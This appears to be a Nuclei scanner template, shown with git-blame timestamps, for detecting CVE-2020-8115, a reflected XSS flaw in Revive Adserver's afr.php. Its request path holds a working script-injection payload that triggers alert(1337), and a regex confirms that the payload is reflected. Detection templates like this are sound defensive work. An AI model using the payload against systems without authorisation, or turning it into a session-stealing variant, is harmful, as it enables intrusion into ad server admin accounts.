nuclei-templates/cves/2020/CVE-2020-8115.yaml

26 lines
1.2 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-8115
2020-04-08 11:27:13 +00:00
info:
name: Revive Adserver XSS
2021-06-09 12:20:56 +00:00
author: madrobot,dwisiswant0
2020-05-25 07:49:06 +00:00
severity: medium
2021-03-24 07:00:21 +00:00
description: |
A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
reference: |
- https://hackerone.com/reports/775693
- https://www.revive-adserver.com/security/revive-sa-2020-001/
tags: cve,cve2020,xss
2020-04-08 11:27:13 +00:00
requests:
- method: GET
path:
2020-04-09 13:02:30 +00:00
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
matchers-condition: and
2020-04-08 11:27:13 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
- type: regex
2020-04-08 11:27:13 +00:00
part: body
regex:
- (?mi)window\.location\.replace\(".*alert\(1337\)